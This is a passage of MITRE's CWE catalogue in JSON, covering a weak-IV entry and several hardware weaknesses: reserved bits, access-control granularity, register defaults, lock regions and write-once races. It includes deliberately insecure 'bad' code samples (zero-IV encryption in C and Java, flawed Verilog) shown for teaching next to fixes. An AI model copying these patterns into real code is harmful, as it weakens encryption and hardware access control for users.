Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated References, Related_Attack_Patterns"}}},"1204":{"attr":{"@_ID":"1204","@_Name":"Generation of Weak Initialization Vector (IV)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a cryptographic primitive that uses an Initialization\\n\\t\\t\\tVector (IV), but the product does not generate IVs that are\\n\\t\\t\\tsufficiently unpredictable or unique according to the expected\\n\\t\\t\\tcryptographic requirements for that primitive.","Extended_Description":"By design, some cryptographic primitives\\n\\t\\t\\t  (such as block ciphers) require that IVs\\n\\t\\t\\t  must have certain properties for the\\n\\t\\t\\t  uniqueness and/or unpredictability of an\\n\\t\\t\\t  IV. Primitives may vary in how important\\n\\t\\t\\t  these properties are. If these properties\\n\\t\\t\\t  are not maintained, e.g. by a bug in the\\n\\t\\t\\t  code, then the cryptography may be weakened\\n\\t\\t\\t  or broken by attacking the IVs themselves.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the IV is not properly initialized, data that is encrypted can be compromised and information about the data can be leaked. See [REF-1179]."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":{"xhtml:p":["Different cipher\\n\\t\\t\\t    modes have different requirements for\\n\\t\\t\\t    their IVs. When choosing and implementing\\n\\t\\t\\t    a mode, it is important to understand\\n\\t\\t\\t    those requirements in order to keep\\n\\t\\t\\t    security guarantees intact. Generally, it\\n\\t\\t\\t    is safest to generate a random IV, since\\n\\t\\t\\t    it will be both unpredictable and have a\\n\\t\\t\\t    very low chance of being non-unique. IVs\\n\\t\\t\\t    do not have to be kept secret, so if\\n\\t\\t\\t    generating duplicate IVs is a concern, a\\n\\t\\t\\t    list of already-used IVs can be kept and\\n\\t\\t\\t    checked against.","NIST offers recommendations on generation of IVs for modes of which they have approved. These include options for when random IVs are not practical. For CBC, CFB, and OFB, see [REF-1175]; for GCM, see [REF-1178]."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-143"},"Intro_Text":"In the following examples, CBC mode is used when encrypting data:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"EVP_CIPHER_CTX ctx;char key[EVP_MAX_KEY_LENGTH];char iv[EVP_MAX_IV_LENGTH];RAND_bytes(key, b);memset(iv,0,EVP_MAX_IV_LENGTH);EVP_EncryptInit(&amp;ctx,EVP_bf_cbc(), key,iv);","xhtml:br":["","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class SymmetricCipherTest {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static void main() {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"byte[] text =\\"Secret\\".getBytes();byte[] iv ={};KeyGenerator kg = KeyGenerator.getInstance(\\"DES\\");kg.init(56);SecretKey key = kg.generateKey();Cipher cipher = Cipher.getInstance(\\"DES/CBC/PKCS5Padding\\");IvParameterSpec ips = new IvParameterSpec(iv);cipher.init(Cipher.ENCRYPT_MODE, key, ips);return cipher.doFinal(inpBytes);","xhtml:br":["","","","","","","","",""],"xhtml:div":{"#text":"0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00","attr":{"@_style":"margin-left:10px;"}}}}}}}}],"Body_Text":"In both of these examples, the initialization vector (IV) is always a block of zeros. This makes the resulting cipher text much more predictable and susceptible to a dictionary attack."},{"Intro_Text":"The Wired Equivalent Privacy (WEP) protocol used in the 802.11\\n\\t\\t\\t    wireless standard only supported 40-bit keys, and the IVs were only 24\\n\\t\\t\\t    bits, increasing the chances that the same IV would be reused for\\n\\t\\t\\t    multiple messages. The IV was included in plaintext as part of the packet, making\\n\\t\\t\\t    it directly observable to attackers. Only 5000 messages are needed\\n\\t\\t\\t    before a collision occurs due to the \\"birthday paradox\\" [REF-1176]. Some\\n\\t\\t\\t    implementations would reuse the same IV for each packet. This IV reuse\\n\\t\\t\\t    made it much easier for attackers to recover plaintext from\\n\\t\\t\\t    two packets with the same IV, using well-understood attacks,\\n\\t\\t\\t    especially if the plaintext was known for one of the packets [REF-1175]."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-1472","Description":"ZeroLogon vulnerability - use of a static IV of all zeroes in AES-CFB8 mode","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472"},{"Reference":"CVE-2011-3389","Description":"BEAST attack in SSL 3.0 / TLS 1.0. In CBC mode, chained initialization vectors are non-random, allowing decryption of HTTPS traffic using a chosen plaintext attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389"},{"Reference":"CVE-2001-0161","Description":"wireless router does not use 6 of the 24 bits for WEP encryption, making it easier for attackers to decrypt traffic","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0161"},{"Reference":"CVE-2001-0160","Description":"WEP card generates predictable IV values, making it easier for attackers to decrypt traffic","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0160"},{"Reference":"CVE-2017-3225","Description":"device bootloader uses a zero initialization vector during AES-CBC","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3225"},{"Reference":"CVE-2016-6485","Description":"crypto framework uses PHP rand function - which is not cryptographically secure - for an initialization vector","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6485"},{"Reference":"CVE-2014-5386","Description":"encryption routine does not seed the random number generator, causing the same initialization vector to be generated repeatedly","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5386"},{"Reference":"CVE-2020-5408","Description":"encryption functionality in an authentication framework uses a fixed null IV with CBC mode, allowing attackers to decrypt traffic in applications that use this functionality","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5408"},{"Reference":"CVE-2017-17704","Description":"messages for a door-unlocking product use a fixed IV in CBC mode, which is the same after each restart","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17704"},{"Reference":"CVE-2017-11133","Description":"application uses AES in CBC mode, but the pseudo-random secret and IV are generated using math.random, which is not cryptographically strong.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11133"},{"Reference":"CVE-2007-3528","Description":"Blowfish-CBC implementation constructs an IV where each byte is calculated modulo 8 instead of modulo 256, resulting in less than 12 bits for the effective IV length, and less than 4096 possible IV values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3528"}]},"Functional_Areas":{"Functional_Area":"Cryptography"},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"20"}},{"attr":{"@_CAPEC_ID":"97"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1175","@_Section":"3. Risks of Keystream Reuse"}},{"attr":{"@_External_Reference_ID":"REF-1175","@_Section":"Appendix C"}},{"attr":{"@_External_Reference_ID":"REF-1176"}},{"attr":{"@_External_Reference_ID":"REF-1177"}},{"attr":{"@_External_Reference_ID":"REF-1178","@_Section":"8.2 IV Constructions"}},{"attr":{"@_External_Reference_ID":"REF-1179"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t\\t\\t  predictability can vary widely. Within the developer and other\\n\\t\\t\\t  communities, \\"randomness\\" is used heavily. However, within\\n\\t\\t\\t  cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t\\t\\t  measurement. There are no commonly-used definitions, even within\\n\\t\\t\\t  standards documents and cryptography papers. Future versions of\\n\\t\\t\\t  CWE will attempt to define these terms and, if necessary,\\n\\t\\t\\t  distinguish between them in ways that are appropriate for\\n\\t\\t\\t  different communities but do not reduce the usability of CWE for\\n\\t\\t\\t  mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-03-09"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes, Observed_Examples, References"}}},"1209":{"attr":{"@_ID":"1209","@_Name":"Failure to Disable Reserved Bits","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The reserved bits in a hardware design are not disabled prior to production. Typically, reserved bits are used for future capabilities and should not support any functional logic in the design.   However, designers might covertly use these bits to debug or further develop new capabilities in production hardware. Adversaries with access to these bits will write to them in hopes of compromising hardware state.","Extended_Description":{"xhtml:p":"Reserved bits are labeled as such so they can be allocated for a later purpose. They are not to do anything in the current design.  However, designers might want to use these bits to debug or control/configure a future capability to help minimize time to market (TTM). If the logic being controlled by these bits is still enabled in production, an adversary could use the logic to induce unwanted/unsupported behavior in the hardware."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The Designer and Implementer have to make a conscious choice to do this"},{"Phase":"Implementation","Note":"The Designer and Implementer have to make a conscious choice to do this"},{"Phase":"Documentation","Note":"If documentation labels anything \\"for future use\\", \\"reserved\\", or the like, such labeling could indicate to an attacker a potential attack point"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Varies by Context","Note":"This type of weakness all depends on the capabilities of the logic being controlled or configured by the reserved bits"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"Include a feature to disable reserved bits."}},{"Phase":"Integration","Description":{"xhtml:p":"Any writes to these reserve bits are blocked (e.g., ignored, access-protected, etc.), or an exception can be asserted."}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An adversary may perform writes to reserve space in hopes to change the behavior of the hardware.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"// Assume an IP has address space 0x0-0x0F for its configuration registers, with the last one labeled reserved (i.e. 0x0F).  Therefore inside the Finite State Machine (FSM), the code is as follows:reg gpio_out = 0;  //gpio should remain low for normal operationcase (register_address)4\'b1111 : //0x0Fbegingpio_out = 1;end","xhtml:br":["","","","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"reg gpio_out = 0;  //gpio should remain low for normal operationcase (register_address)//4\'b1111 : //0x0Fdefault: gpio_out = gpio_out;","xhtml:br":["","",""]}}],"Body_Text":"In the code above, the GPIO pin should remain low for normal operation.  However, it can be asserted by accessing the reserved address space (0x0F).  This may be a concern if the GPIO state is being used as an indicator of health (e.g. if asserted the hardware may respond by shutting down or resetting the system which may not be the correct action the system should perform)."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"121"}}},"Content_History":{"Submission":{"Submission_Name":"Brent Sherman","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-06"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1220":{"attr":{"@_ID":"1220","@_Name":"Insufficient Granularity of Access Control","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product implements access controls via a policy or other feature with the intention to disable or restrict accesses (reads and/or writes) to assets in a system from untrusted agents. However, implemented access controls lack required granularity, which renders the control policy too broad because it allows accesses from unauthorized agents to the security-sensitive assets.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware engines can expose accesses to assets (device configuration, keys, etc.) to trusted firmware or a software module (commonly set by BIOS/bootloader). This access is typically access-controlled. Upon a power reset, the hardware or system usually starts with default values in registers, and the trusted firmware (Boot firmware) configures the necessary access-control protection.","A common weakness that can exist in such protection schemes is that access controls or policies are not granular enough. This condition allows agents beyond trusted agents to access assets and could lead to a loss of functionality or the ability to set up the device securely. This further results in security risks from leaked, sensitive, key material to modification of device configuration."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Other"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Access-control-policy protections must be reviewed for design inconsistency and common weaknesses.","Access-control-policy definition and programming flow must be tested in pre-silicon, post-silicon testing."]}},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":{"xhtml:p":["Consider a system with a register for storing AES key for encryption or decryption. The key is 128 bits, implemented as a set of four 32-bit registers. The key registers are assets and registers, AES_KEY_READ_POLICY and AES_KEY_WRITE_POLICY, and are defined to provide necessary access controls.","The read-policy register defines which agents can read the AES-key registers, and write-policy register defines which agents can program or write to those registers. Each register is a 32-bit register, and it can support access control for a maximum of 32 agents. The number of the bit when set (i.e., \\"1\\") allows respective action from an agent whose identity matches the number of the bit and, if \\"0\\" (i.e., Clear), disallows the respective action to that corresponding agent."]},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0",{"#text":"AES key [0:31] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_1",{"#text":"AES key [32:63] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_2",{"#text":"AES key [64:95] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_4",{"#text":"AES key [96:127] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_KEY_READ_WRITE_POLICY","[31:0] Default 0x00000006 - meaning agent with identities \\"1\\" and \\"2\\" can both read from and write to key registers"]}]}},{"attr":{"@_Nature":"mitigation"},"xhtml:table":{"xhtml:tr":[{"xhtml:td":["AES_KEY_READ_POLICY","[31:0] Default 0x00000002 - meaning only Crypto engine with identity \\"1\\" can read registers: AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3"]},{"xhtml:td":["AES_KEY_WRITE_POLICY","[31:0] Default 0x00000004 - meaning only trusted firmware with identity \\"2\\" can program registers: AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3"]}]}}],"Body_Text":["In the above example, there is only one policy register that controls access to both read and write accesses to the AES-key registers, and thus the design is not granular enough to separate read and writes access for different agents. Here, agent with identities \\"1\\" and \\"2\\" can both read and write.","A good design should be granular enough to provide separate access controls to separate actions. Access control for reads should be separate from writes. Below is an example of such implementation where two policy registers are defined for each of these actions. The policy is defined such that: the AES-key registers can only be read or used by a crypto agent with identity \\"1\\" when bit #1 is set. The AES-key registers can only be programmed by a trusted firmware with identity \\"2\\" when bit #2 is set."]},{"Intro_Text":"Consider the following SoC\\n\\t      design. The sram in HRoT has an address range that is readable and writable by unprivileged\\n\\t      software and it has an area that is only readable by unprivileged software. The tbus\\n\\t      interconnect enforces access control for slaves on the bus but uses only one bit to control\\n\\t      both read and write access. Address 0xA0000000 - 0xA000FFFF is readable and writable\\n\\t      by the untrusted cores core{0-N} and address 0xA0010000 - 0xA001FFFF is only\\n\\t      readable by the untrusted cores core{0-N}.","Body_Text":{"xhtml:img":{"attr":{"@_src":"https://cwe.mitre.org/data/images/HRoT-CWE.png","@_alt":"Hardware Root of Trust"}},"xhtml:p":["The security policy access control is not granular enough, as it uses one bit to enable both\\n\\t      read and write access. This gives write access to an area that should only be readable\\n\\t      by unprivileged agents.","Access control logic should differentiate between read and write access and to have\\n\\t      sufficient address granularity."]}}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-05"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-07-16","Contribution_Comment":"Provided Demonstrative Example for Hardware Root of Trust"}}},"1221":{"attr":{"@_ID":"1221","@_Name":"Incorrect Register Defaults or Module Parameters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Hardware description language code incorrectly defines register defaults or hardware IP parameters to insecure values.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to defined default values that are hard coded in the hardware description language (HDL) code of the hardware unit. Hardware descriptive languages also support definition of parameter variables, which can be defined in code during instantiation of the hardware IP module. Such parameters are generally used to configure a specific instance of a hardware IP in the design.","The system security settings of a hardware design can be affected by incorrectly defined default values or IP parameters. The hardware IP would be in an insecure state at power reset, and this can be exposed or exploited by untrusted software running on the system. Both register defaults and parameters are hardcoded values, which cannot be changed using software or firmware patches but must be changed in hardware silicon. Thus, such security issues are considerably more difficult to address later in the lifecycle. Hardware designs can have a large number of such parameters and register defaults settings, and it is important to have design tool support to check these settings in an automated way and be able to identify which settings are security sensitive."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Such issues could be introduced during implementation of hardware design, since IP parameters and defaults are defined in HDL code and identified later during Testing or System Configuration phases."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":"Varies by Context","Note":"Degradation of system functionality, or loss of access control enforcement can occur."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"During hardware design, all the system parameters and register defaults must be reviewed to identify security sensitive settings."},{"Phase":"Implementation","Description":"The default values of these security sensitive settings need to be defined as part of the design review phase."},{"Phase":"Testing","Description":"Testing phase should use automated tools to test that values are configured per design specifications."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider example design module system verilog code shown below.register_example module is an example parameterized module that defines two parameters, REGISTER_WIDTH and REGISTER_DEFAULT. Register_example module defines a Secure_mode setting, which when set makes the register content read-only and not modifiable by software writes. register_top module instantiates two registers, Insecure_Device_ID_1 and Insecure_Device_ID_2. Generally, registers containing device identifier values are required to be read only to prevent any possibility of software modifying these values.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"// Parameterized Register module example// Secure_mode : REGISTER_DEFAULT[0] : When set to 1 register is read only and not writable///module register_examples#(parameter REGISTER_WIDTH = 8, // Parameter defines width of register, default 8 bitsparameter [REGISTER_WIDTH-1:0] REGISTER_DEFAULT = 2**REGISTER_WIDTH -2 // Default value of register computed from Width. Sets all bits to 1s except bit 0 (Secure _mode))(input [REGISTER_WIDTH-1:0] Data_in,input Clk,input resetn,input write,output reg [REGISTER_WIDTH-1:0] Data_out);reg Secure_mode;always @(posedge Clk or negedge resetn)if (~resetn)beginData_out &lt;= REGISTER_DEFAULT; // Register content set to Default at resetSecure_mode &lt;= REGISTER_DEFAULT[0]; // Register Secure_mode set at resetendelse if (write &amp; ~Secure_mode)beginData_out &lt;= Data_in;endendmodulemodule register_top(input Clk,input resetn,input write,input [31:0] Data_in,output reg [31:0] Secure_reg,output reg [31:0] Insecure_reg);register_example #(.REGISTER_WIDTH (32),.REGISTER_DEFAULT (1224) // Incorrect Default value used bit 0 is 0.) Insecure_Device_ID_1 (.Data_in (Data_in),.Data_out (Secure_reg),.Clk (Clk),.resetn (resetn),.write (write));register_example #(.REGISTER_WIDTH (32) // Default not defined 2^32-2 value will be used as default.) Insecure_Device_ID_2 (.Data_in (Data_in),.Data_out (Insecure_reg),.Clk (Clk),.resetn (resetn),.write (write));endmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"register_example #(.REGISTER_WIDTH (32),.REGISTER_DEFAULT (1225) // Correct default value set, to enable Secure_mode) Secure_Device_ID_example (.Data_in (Data_in),.Data_out (Secure_reg),.Clk (Clk),.resetn (resetn),.write (write));","xhtml:br":["","","","","","","","",""]}}],"Body_Text":["These example instantiations show how, in a hardware design, it would be possible to instantiate the register module with insecure defaults and parameters.","In the example design, both registers will be software writable since Secure_mode is defined as zero."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"166"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-12-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1222":{"attr":{"@_ID":"1222","@_Name":"Insufficient Granularity of Address Regions Protected by Register Locks","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product defines a large address region protected from modification by the same register lock control bit. This results in a conflict between the functional requirement that some addresses need to be writable by software during operation and the security requirement that the system configuration lock bit must be set during the boot process.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware IPs can expose the device configuration controls that need to be programmed after device power reset by a trusted firmware or software module (commonly set by BIOS/bootloader) and then locked from any further modification. In hardware design, this is commonly implemented using a programmable lock bit which enables/disables writing to a protected set of registers or address regions. When the programmable lock bit is set, the relevant address region can be implemented as a hardcoded value in hardware logic that cannot be changed later.","A problem can arise wherein the protected region definition is not granular enough. After the programmable lock bit has been set, then this new functionality cannot be implemented without change to the hardware design."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1220","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"Such issues are introduced during hardware architecture and design since software controls and configuration are defined during these phases and identified later during Testing or System Configuration phases."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Other","Note":"System security configuration cannot be defined in a way that does not conflict with functional requirements of device."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":["The defining of protected locked registers should be reviewed or tested early in the design phase with software teams to ensure software flows are not blocked by the security locks.","As an alternative to using register lock control bits and fixed access control regions, the hardware design could use programmable security access control configuration so that device trusted firmware can configure and change the protected regions based on software usage and security models."]}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"For example, consider a hardware unit with a 32 kilobyte configuration address space where the first 8 kilobyte address contains security sensitive controls that must only be writable by device bootloader. One way to protect the security configuration could be to define a 32 bit system configuration locking register (SYS_LOCK) where each bit lock locks the corresponding 1 kilobyte region.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":[{"xhtml:tbody":{"xhtml:tr":[{"xhtml:th":["Address","Register"]},{"xhtml:td":[0,"SYS_LOCK: 32 bit system configuration lock register, each bit is write-1-once"]},{"xhtml:td":[4,"SECURITY_FEATURE_ENABLE: 32 bit register controlling enabling of security features"]},{"xhtml:td":["...",""]},{"xhtml:td":[784,"SW_MODE: 32 bit Software Mode indication register"]}]}},{"xhtml:tbody":{"xhtml:tr":[{"xhtml:th":["Address region","Lock bit"]},{"xhtml:td":["0x0000 - 0x03FF","SYS_LOCK[0]"]},{"xhtml:td":["0x0400 - 0x07FF","SYS_LOCK[1]"]},{"xhtml:td":["...",""]},{"xhtml:td":["0x7C00 - 0x7FFF","SYS_LOCK[31]"]}]}}]},"Body_Text":"If a register exists within the first kilobyte address range (e.g. SW_MODE, address 0x310) and needs to be software writable at runtime, then this register cannot be written in a securely configured system since SYS_LOCK register lock bit 0 must be set to protect other security settings (e.g. SECURITY_FEATURE_ENABLE, address 0x0004). The only fix would be to change the hardware logic or not set the security lock bit."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-12-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1223":{"attr":{"@_ID":"1223","@_Name":"Race Condition for Write-Once Attributes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A write-once register in hardware design is programmable by an untrusted software component earlier than the trusted software component, resulting in a race condition issue.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to defined default values that are hard coded in the hardware description language (HDL) code of the hardware unit. A common security protection method used to protect register settings from modification by software is to make them write-once. This means the hardware implementation only allows writing to such registers once, and they become read-only after having been written once by software. This is useful to allow initial boot software to configure systems settings to secure values while blocking runtime software from modifying such hardware settings.","Implementation issues in hardware design of such controls can expose such registers to a race condition security flaw. For example, consider a hardware design that has two different software/firmware modules executing in parallel. One module is trusted (module A) and another is untrusted (module B). In this design it could be possible for Module B to send write cycles to the write-once register before Module A. Since the field is write-once the programmed value from Module A will be ignored and the pre-empted value programmed by Module B will be used by hardware."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"This weakness can appear in designs that use register write-once attributes with two or more software/firmware modules with varying levels of trust executing in parallel."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"System configuration cannot be programmed in a secure way."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"During hardware design all register write-once or sticky fields must be evaluated for proper configuration."},{"Phase":"Testing","Description":"The testing phase should use automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"consider the example design module system verilog code shown below. register_write_once_example module is an example of register that has a write-once field defined. Bit 0 field captures the write_once_status 